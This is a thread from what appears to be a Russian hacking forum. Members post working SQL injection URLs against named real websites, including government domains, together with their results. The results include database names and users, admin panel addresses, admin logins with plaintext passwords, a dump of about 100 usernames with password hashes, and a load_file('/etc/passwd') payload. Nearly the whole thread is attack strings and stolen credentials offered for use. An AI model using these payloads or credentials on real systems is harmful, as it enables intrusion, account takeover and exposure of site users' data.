SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    Database Version: 5.0.67-community-log
    Database name: mizangro_mizan
    User name: mizangro_usermiz@localhost
     
    #8441 .:[melkiy]:., 22 Mar 2009
    Last edited: 22 Mar 2009
  2. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Code:
    ]http://www.cdk.ru/event.php?id=-65'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13--+
    Database Version: 4.1.20-log
    Database name: web60_db1
    User name: web60_u1@localhost

    log : :(
    pass: qwer123
     
  3. Морок

    Морок New Member

    Joined:
    6 Mar 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    1
    http://www.sesame-ip.eu/public/educ_cruise.php?cruise=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,pwd,user()),6,7,8,9,10,11,12+from+login+limit+0,1/*


    Походу таблица с админовскими регами, но линк к админке не нарылся.
     
  4. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    Code:
    http://www.pokrishka.ru/discs_auto.html?model=-2500+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
    Database Version: 5.1.30-community
    Database name: shina
    User name: shina@localhost

    админки тут я нашел 2
    http://www.pokrishka.ru/admin.php
    http://www.pokrishka.ru/partners/admin.php
    из базы выудил 2 логин пароля
    administrator:shina33
    admin:pokrishka33
    подходит только второй логин:пасс во вторую админку...

    Code:
    http://www.autoshkola.com.ua/index.php?page=photo&lang=rus&idpr=37+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5--
    4.1.22-standard-log
    autos_webmix
    autos_webmix@localhost

    Code:
    http://yulis-ek.ru/inner.php?all_news&details=-4+union+select+1,2,3,4,5,6,7,8,9,0,1--
    Database Version: 4.0.24_Debian-10sarge2-log
    Database name: yulis-ek
    User name: yulis-ek@localhost
    вывод в title

    Code:
    http://www.shinexpress.ru/all_info.php?cat_info=3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7--
    5.0.67-percona-b5-log:st176-web:st176-web@localhost

    Code:
    http://www.autoweek.com.ua/modules.php?op=modload&name=News&file=article&sid=-2108+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--
    4.1.22-log:autoweek:u_autoweek@localhost
     
    #8444 F4R, 22 Mar 2009
    Last edited by a moderator: 22 Mar 2009
  5. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    2
    Likes Received:
    8
    Reputations:
    1
    Code:
    http://finnews.ru/exch_punkts.php?region=-1+UNION+SELECT+concat_ws(0x3a,login,passwd,fio,perm)+from+t_users+limit+5,1--&curr=USD
    Database Version: 5.0.67-log
    Database name: u13279
    User name: [email protected]
     
  6. Морок

    Морок New Member

    Joined:
    6 Mar 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    1
    http://www.consumer-education.eu/?f_cid=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,LoginName,LoginPass,Email),10,11,12,13,14+from+_tabUzivatele/*
    Login:SuperAdmin
    pass:ASAP

    Выборка по админам.

    http://www.consumer-education.eu/admin/ логинимся.....
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Database Version: 5.0.21-standard
    Database name: onespirit_db
    User name: user_onespirit@localhost

    Юзеры:

    Code:
    [1]betrayz:e664b4445ba17a97962ada2740a85043
    [2]:tatesrey:955bfb24aa1f034b654741d0c5024f63
    [3]:Fat_Mike:b06265e78e4b53ecf9b19b67e440b2b0
    [4]:thaiking:b06265e78e4b53ecf9b19b67e440b2b0
    [5]:HR_BILL:b06265e78e4b53ecf9b19b67e440b2b0
    [6]:blkscorp:b06265e78e4b53ecf9b19b67e440b2b0
    [7]:suntzuaow:b06265e78e4b53ecf9b19b67e440b2b0
    [8]:Hillary:b06265e78e4b53ecf9b19b67e440b2b0
    [9]:rocca_rocca:b06265e78e4b53ecf9b19b67e440b2b0
    [10]:DaBears:b06265e78e4b53ecf9b19b67e440b2b0
    [11]:Alex:b06265e78e4b53ecf9b19b67e440b2b0
    [12]:Diane73:b06265e78e4b53ecf9b19b67e440b2b0
    [13]:johnnyQB:b06265e78e4b53ecf9b19b67e440b2b0
    [14]:RedBull99:b06265e78e4b53ecf9b19b67e440b2b0
    [15]:garkaviud:94e05df963c698659302c13d73af2de9
    [16]:Nickytime:b06265e78e4b53ecf9b19b67e440b2b0
    [17]:niagara:e31da09a7e4fd35a379f53838adb323d
    [18]:leeroy:bf779e0933a882808585d19455cd7937
    [19]:fpetatertott:0e97a5f425cd8ec32f2b85919ac882ba
    [20]:tatertott:fc8b24798df050b4a65787f17f800c17
    [21]:TrevolHelper:2fea504f51f73d921131a701985dcd04
    [22]:Johnny2Fist:b06265e78e4b53ecf9b19b67e440b2b0
    [23]:mayor:f96f9912346f00aecc56420d1d074007
    [24]:MainDadyFirst:98ec24a321731b08d39976fa06d77fff
    [25]:RohanYaakov:12e515aa4500ddc17d67355943a89b50
    [26]:Andy:1a08c859899ffdb654cf946b38b7dadc
    [27]:Shawn:6f8af72e0a79429cd9b8d1546d90c0d4
    [28]:guamymouttnen:789b809d87bde5c97b002ed7874f5600
    [29]:Dennis:d16d03028a9d03d9098db9d2d5a695d4
    [30]:pyratechick:9e79a6144aae0adae9a322265198fc68
    [31]:Marat:e31da09a7e4fd35a379f53838adb323d
    [32]:jumpkickjon:a6724eb2da65e96099386342fe4b6c77
    [33]:CefgootoKeype:a008948daa6e7fa44c1d96c7e6056c0b
    [34]:fanaticsep:5a1640ae50604d6b5e03adc1c2365cd6
    [35]:gymnadvadia:5526c74704f1243f626db2848eb564ee
    [36]:onlinepornrpon:4479842dd2b3220c85a95e9e2f323f2d
    [37]:mazdacazda:bf16b9e58e38e3f90d647e42371c2c69
    [38]:tenoenesq:5e26c2c2ba57bbe63b2940d695df164f
    [39]:VTCHRISTIE:6036052f8c203d32cc680b5d71bc716f
    [40]:fuckahmadenagad:fbbf0df68a1929f5878b794bbc290f8e
    [41]:J_B:6d8e5be200a835beb77d899f00b890a5
    [42]:James:053a88bf2912a032fe9ec0cf56d4e528
    [43]:edmac:f06cb7b0c68c70678c6dc283afee4c76
    [44]:brad:517c1fc74b014bf0419debad857e0583
    [45]:Melanie:352ad5a293c7a1c38be28965ae5a1645
    [46]:MonicaH:edccf286ccd738e8c4fc1ed56e10aced
    [47]:bmaurer:1a6a1b6fd23a41cdc097526f09c877ad
    [48]:Som:86ebb2f3a7a183cc8f7479bb0c52ccbd
    [49]:tmessick73:55608d6a3a1c654be4d0d5f153d8e420
    [50]:Chris:3106ad9a77f361f6fa4c6b591171f138
    [51]:FranStarr:dbea94528f2cb5d5c5fcfdc4de7a8aa9
    [52]:brianchang:acb80815e691b3ecc2a104a12fb5930e
    [53]:philh3:a17430ca6bc4f30a7345ddff85819921
    [54]:houdiepatootie:aafa81b88f53c4a6635bf2d4877df724
    [55]:maria:3668fd5c877ae4f37c5138056cec13c3
    [56]:techdragon:1671c6ae4eedf7fe0197935aecbbb400
    [57]:chaichat:3fd002edc1741e97164d976c98f36998
    [58]:kickin_booty:5f4dcc3b5aa765d61d8327deb882cf99
    [59]:Rockin_Fist:5f4dcc3b5aa765d61d8327deb882cf99
    [60]:BlkButterfly:2c0948930e1d10f9eff79787d8065dad
    [61]:Fleeveloniero:e4296a5fecb89bd4ae507801fa3f71ec
    [62]:HomaivaHick:45ffaa5a82c516fabe0932e2b55a5611
    [63]:Heerpinee:e480435750dd9aadf9b2b8fde3ef4f3d
    [64]:amummaomizaxy:aa85b79122a874b26e87cb769d40bf85
    [65]:astendina:f60c8f4363374dc48cb182ae225ebd87
    [66]:cedaBaina:0b9f4cac06360b1629f09eaf5f4623ac
    [67]:Moinnytancy:74794f4521dbcfc51f447c19dc9dadfe
    [68]:Lindmannnn:76b4497543fb53b48d3634026a4e6be9
    [69]:kastarz:b863cf827d52590568872d8490a1f932
    [70]:TeesBimb:8ac25f3f2d77816d50d692027be48fb9
    [71]:Amoufffic:8ac25f3f2d77816d50d692027be48fb9
    [72]:EMAIDLICDYDAY:0f2e3eb482a73487e9e6b46976a8ded8
    [73]:DixBarappoida:be12b41915d98d60210451518730b9b3
    [74]:Hajemipem:d174d702ef805627f5f079445990ca61
    [75]:lienoureobelF:b769cf9c4c7728e0d12200a2029e7cdb
    [76]:JohnVK:7ccd8f39aeed5558e62bdc1aa928b7dd
    [77]:suiclewew:128421cfae1425c3a7b56dfd5ea40e94
    [78]:shumomifan:412c72738d1f15f20c05224f4f1c70ba
    [79]:Vahid:dc855c92329ffba92c608cd6d3b900c5
    [80]:mherring:c6e83965fedb97e17664cf3bc6171235
    [81]:YOChristopher:12d20a36a68eaf350c68b3e45ba1a886
    [82]:SteveT:49d22931473fb7214f64804e09aae3de
    [83]:McStivenLou:b0c9cd72a019a6617c9a8d134d2c0cf7
    [84]:JRockwell:0c83279e6e0c24896825ac459435f623
    [85]:Webwhiteman:dae457420fde145e136a473a31647651
    [86]:maxfreemann:2d16a2e9d88a11a53fbe5048da9c3f95
    [87]:ISeduction:3a824c5972104d8529462ed8117f5c7a
    [88]:LararoGO:264b12ae604642520e73317bfd2a17d6
    [89]:Ferafloalf:c3b69388b313e571fe008b3ae6eff2ac
    [90]:sdriseeo:acd6453580b959ec3ca4fa659a74668a
    [91]:stjhonecity:04cb23d2ed99f48531d335cf0bb4ad21
    [92]:ScottAL:79bd522ea6c2a26ad7f60a72ed516175
    [93]:PWRichard:4a06a98757f1634a4937cd688a87dd76
    [94]:LFJohn:f9dc535fdfb997db20f1aed51c738ea7
    [95]:AntonPotaPo:9007a657330e4241bc2fdc00b11d0c9f
    [96]:mstobil:eb15061b2a7c148d8463403731f526ff
    [97]:SendrikBlack:a762072f07ff345b334d29b002190907
    [98]:ESLuis:98bc69e0950bfdaf3d6abbcb67eb9ea1
    [99]:refeywal:ab85b7a32f05f684962a03bb4ab562b9
    [100]:Elizabetrt:7f710ef317f86070a1c2874dca433f87
    
     
  8. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    САЙТ Гор. Харькова

    4.0.26-log:poisk:poisk@localhost
     
    2 people like this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _http://www.regentherapy.com/back.php?id=-58'+union+select+1,2,version(),4,5,6,7/*
    4.1.22-standard
     
    _________________________
    1 person likes this.
  10. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    САМАРА Сегодня

    http://www.samaratoday.ru/news.php?id=-166793+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,1,2,3,4,5,6,7--

    Database Version: 5.0.45
    Database name: samaratoda_news
    User name: samaratoda_news@localhost


    Code:
    16 :In database information_schema found table USER_PRIVILEGES
       1 :   GRANTEE
       2 :   TABLE_CATALOG
       3 :   PRIVILEGE_TYPE
       4 :   IS_GRANTABLE
    17 :In database information_schema found table VIEWS
       1 :   TABLE_CATALOG
       2 :   TABLE_SCHEMA
       3 :   TABLE_NAME
       4 :   VIEW_DEFINITION
       5 :   CHECK_OPTION
       6 :   IS_UPDATABLE
       7 :   DEFINER
       8 :   SECURITY_TYPE
    18 :In database samaratoda_news found table authors
       1 :   idAuthor
       2 :   nameAuthor
       3 :   orgNameAuthor
       4 :   emailAuthor
    19 :In database samaratoda_news found table comment
       1 :   idComment
       2 :   idNewsComment
       3 :   dateComment
       4 :   nickComment
       5 :   textComment
       6 :   emailComment
       7 :   ipComment
    20 :In database samaratoda_news found table confirm
       1 :   idConfirm
       2 :   dateExpirate
       3 :   random
       4 :   idUser
    21 :In database samaratoda_news found table groups
       1 :   groupid
       2 :   groupname
    22 :In database samaratoda_news found table grouptouser
       1 :   grouptouserid
       2 :   userid
       3 :   groupid
    23 :In database samaratoda_news found table indexDayCache
       1 :   cacheIndex
       2 :   idNews
       3 :   dateNews
       4 :   headNews
    24 :In database samaratoda_news found table links
       1 :   idLink
       2 :   nameLink
       3 :   urlLink
       4 :   idRubLink
       5 :   idTopicLink
       6 :   exportFlagLink
    25 :In database samaratoda_news found table login_jour
       1 :   idLogin
       2 :   dateLogin
       3 :   ipLogin
       4 :   idUserLogin
    26 :In database samaratoda_news found table mylog
       1 :   Id
       2 :   log_time
       3 :   logtext
    27 :In database samaratoda_news found table news
       1 :   idNews
       2 :   dateNews
       3 :   idRubNews
       4 :   idAuthorNews
       5 :   idPhotographerNews
       6 :   headNews
       7 :   lidNews
       8 :   bodyNews
       9 :   sourceNews
       10 :   priorAttrNews
       11 :   urlSourceNews
       12 :   titleImgNews
       13 :   showAnnonceNews
       14 :   textAnnonceNews
       15 :   autoDayNews
       16 :   urlOrigNews
       17 :   urlCitNews
    28 :In database samaratoda_news found table news2006
       1 :   idNews
       2 :   dateNews
       3 :   idRubNews
       4 :   idAuthorNews
       5 :   idPhotographerNews
       6 :   headNews
       7 :   lidNews
       8 :   bodyNews
       9 :   sourceNews
       10 :   priorAttrNews
       11 :   urlSourceNews
       12 :   titleImgNews
       13 :   showAnnonceNews
       14 :   textAnnonceNews
       15 :   autoDayNews
    29 :In database samaratoda_news found table news_arch
       1 :   idNews
       2 :   dateNews
       3 :   idRubNews
       4 :   idAuthorNews
       5 :   idPhotographerNews
       6 :   headNews
       7 :   lidNews
       8 :   bodyNews
       9 :   sourceNews
       10 :   priorAttrNews
       11 :   urlSourceNews
       12 :   titleImgNews
       13 :   showAnnonceNews
       14 :   textAnnonceNews
       15 :   autoDayNews
       16 :   urlOrigNews
       17 :   urlCitNews
    30 :In database samaratoda_news found table news_cache
       1 :   cacheIndex
       2 :   idNews
       3 :   dateNews
       4 :   idRubNews
       5 :   idAuthorNews
       6 :   idPhotographerNews
       7 :   headNews
       8 :   lidNews
       9 :   bodyNews
       10 :   sourceNews
       11 :   priorAttrNews
       12 :   urlSourceNews
       13 :   titleImgNews
       14 :   showAnnonceNews
       15 :   textAnnonceNews
       16 :   autoDayNews
    31 :In database samaratoda_news found table news_log
       1 :   idLog
       2 :   idNews
       3 :   dateNews
       4 :   idRubNews
       5 :   idAuthorNews
       6 :   idPhotographerNews
       7 :   headNews
       8 :   lidNews
       9 :   bodyNews
       10 :   sourceNews
       11 :   priorAttrNews
       12 :   urlSourceNews
       13 :   titleImgNews
       14 :   showAnnonceNews
       15 :   textAnnonceNews
       16 :   autoDayNews
       17 :   userId
       18 :   date_zapros
       19 :   zapros
       20 :   urlOrigNews
       21 :   urlCitNews
    32 :In database samaratoda_news found table news_topics
       1 :   idNews_Topic
       2 :   idNews
       3 :   idTopic
    33 :In database samaratoda_news found table news_users
       1 :   idNews_User
       2 :   idNews
       3 :   idUser
    34 :In database samaratoda_news found table photographers
       1 :   idPhotographer
       2 :   namePhotographer
       3 :   orgNamePhotographer
    35 :In database samaratoda_news found table rubrics
       1 :   idRubric
       2 :   nameRubric
       3 :   lidRubric
       4 :   sortIdRubric
    36 :In database samaratoda_news found table seqid
       1 :   idSeq
       2 :   dummy
    37 :In database samaratoda_news found table seqid_t
       1 :   idSeq
       2 :   dummy
    38 :In database samaratoda_news found table subscr_users
       1 :   userid
       2 :   username
       3 :   passwrd
       4 :   email
       5 :   firstname
       6 :   lastname
       7 :   middlename
       8 :   countryid
       9 :   state
       10 :   city
       11 :   zip
       12 :   address
       13 :   phone
       14 :   cellphone
       15 :   pgrphone
       16 :   pgrnumber
    39 :In database samaratoda_news found table subscribe
       1 :   subscribeId
       2 :   created
       3 :   subscribeName
       4 :   subscribePeriod
       5 :   userId
       6 :   confirm
    40 :In database samaratoda_news found table topics
       1 :   idTopic
       2 :   nameTopic
       3 :   actualAttrTopic
    41 :In database samaratoda_news found table update_status
       1 :   id_update_status
       2 :   update_time
       3 :   update_finished
    42 :In database samaratoda_news found table user_rubric
       1 :   idUser_rubric
       2 :   idUser
       3 :   idRubric
    43 :In database samaratoda_news found table users
       1 :   userid
       2 :   username
       3 :   passwrd
       4 :   email
       5 :   firstname
       6 :   lastname
       7 :   middlename
       8 :   countryid
       9 :   state
       10 :   city
       11 :   zip
       12 :   address
       13 :   phone
       14 :   cellphone
       15 :   pgrphone
       16 :   pgrnumber

    в табличку USERS тока 2 записи:
    [1]:1:Светлана:111111:[email protected]
    [2]:2:Alex:8e956352ad5b3a54076586b4f612b601:[email protected]

    второй хэш не осилил)
     
    #8450 F4R, 22 Mar 2009
    Last edited by a moderator: 22 Mar 2009
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.kcsoul.com/urban-events-calendar/detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
    user() : database() : version()
    sherryml_genuser@localhost : sherryml_db : 5.0.45-community
     
  12. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.ppi-jepang.org/print.php?id=-61+union+select+1,2,3,version(),5,6,7--
    Code:
    http://ebursa.depdiknas.go.id/pustaka/ptk/record.php?id=-28%20union%20select%201,2,table_name%20from%20information_schema.tables--
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.mef.gov.kh/new_mef/macroeconomic-detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
    user() : database() : version()
    [email protected] : mefgovkh_web : 5.0.32-Debian_7etch5~bpo31+1-log
     
    1 person likes this.
  14. Морок

    Морок New Member

    Joined:
    6 Mar 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    1
    http://www.passionforstone.eu/index.php?id_sect=-1+union+select+concat_ws(0x3a3a,user(),database(),version())--

    Админка по адресу: http://www.passionforstone.eu/admin/login.php

    В базе отсутствуют поля отвечающие за аутентификацию. Или разделение прав или прописано в файлах.
     
    1 person likes this.
  15. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Code:
    http://www.foresia.com/images/index.php?pageid=217204'+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
    user(): [email protected]
    database(): stamco
    version(): 4.1.22
    PR: 3
    ---------------------------------------------------
    Code:
    http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7+--+
    Code:
    http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7+--+
    user(): [email protected]
    database(): Kincrome
    version(): 5.0.56sp1-enterprise-gpl
    PR: 4
    ---------------------------------------------------
    Code:
    http://www.mirabili.it/fotobis.php?idevento=-29+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/*
    user(): mirabilidb@localhost
    database(): mirabili_it
    version(): 4.0.24_Debian-10sarge3-log
    PR: 4
     
    1 person likes this.
  16. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://trentondevils.com/page.php?pid=-228+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*

    Database Version: 4.1.20-log
    Database name: tdevils_db
    User name: tdevils@localhost
     
    1 person likes this.
  17. Морок

    Морок New Member

    Joined:
    6 Mar 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    1
    http://www.initiativeforpeacebuilding.eu/resource.php?c=-1+union+select+1,concat_ws(0x3a3a,user(),version(),database()),3,4--

    http://www.initiativeforpeacebuilding.eu/Admin <- Basic auth
     
    2 people like this.
  18. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://www.vsmc.com.vn/news_detail.php?id=19+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+limit+1,1
    version():5.0.67-community
    database():vsmccom_datavsmc
    user():vsmccom_sisoft@localhost
     
    1 person likes this.
  19. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.textile.web.id/member/index.php?id=-21+union+select+version(),2,3,4--
    Code:
    http://www.iwandarmansjah.web.id/medical.php?id=-309+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9--
     
    #8459 ПаВлУшКа, 23 Mar 2009
    Last edited by a moderator: 23 Mar 2009
    1 person likes this.
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Database Version: 5.0.67
    Database name: b30500_zelan
    User name: [email protected]


    Database Version: 5.0.24-community-nt-log
    Database name: lbn
    User name: lbndb@localhost

    Вытаскивать из USERS


    Database Version: 4.1.22-standard-log
    Database name: alatusr_1
    User name: alatusr_user@localhost


    ТОВ "Укрреставрацiя"

    Database Version: 5.0.22
    Database name: ukrrest_main
    User name: ukrrest_root@localhost

    Login:admin
    Pass:b0fb7de8ea0d4fce95fc0e4ded766b30: 93UhAwTSYRUL4V7p
    --
    Login::ppfnetua
    Pass:c82982351c43978caa37cbc4df9c8807: kwfgOSZQxjGL4bDE

    Вытаскивать из jos_users


    Database Version: 5.0.22
    Database name: frentana
    User name: ftp_frentana@localhost

    Login: novatek
    Pass: 8b6068265e60d456b7b25160f965bc24 : ??
     
    #8460 .:[melkiy]:., 23 Mar 2009
    Last edited: 23 Mar 2009
Thread Status:
Not open for further replies.